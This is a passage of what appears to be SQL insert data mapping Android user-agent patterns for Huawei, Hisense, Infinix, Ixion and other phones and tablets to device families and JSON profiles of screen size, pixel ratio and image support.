Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI MT7-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI P7-L00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI P7-L07) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI P7-L10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI P7-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI P8max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI RIO-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI RIO-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI RIO-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI RIO-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCC-U21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI SCL-U31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-L32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TAG-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TIT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TIT-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI TIT-U02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L01) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L02) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L03) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-L23) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HUAWEI Y560-U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HW-SCL-L32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HWT31) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; HY1-5085) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Haier_A41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Halona) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hashtag) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hi10 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":853,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hi10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hisense C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hisense C20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hisense F20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Hisense L678) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; I5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; IMO Q2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; INFINIX-X551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; IRON Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; IUNI N1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ilium LT500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ilium X210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ilium X500B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ilium_LT500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ImSmart A503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; ImSmart C501) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Impress Action) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Impress Strong) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Impress Style) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Impress U Too) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; InFocus M808) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infineum Z5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infineum_Z45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix HOT 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix NOTE 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix X510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix X511) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix-X554) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix-X600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Infinix-X600-LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion E250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion EL250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion ES260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion ML150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion ML250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion MS350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion MS450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion P140) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 5.*; Ixion X355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 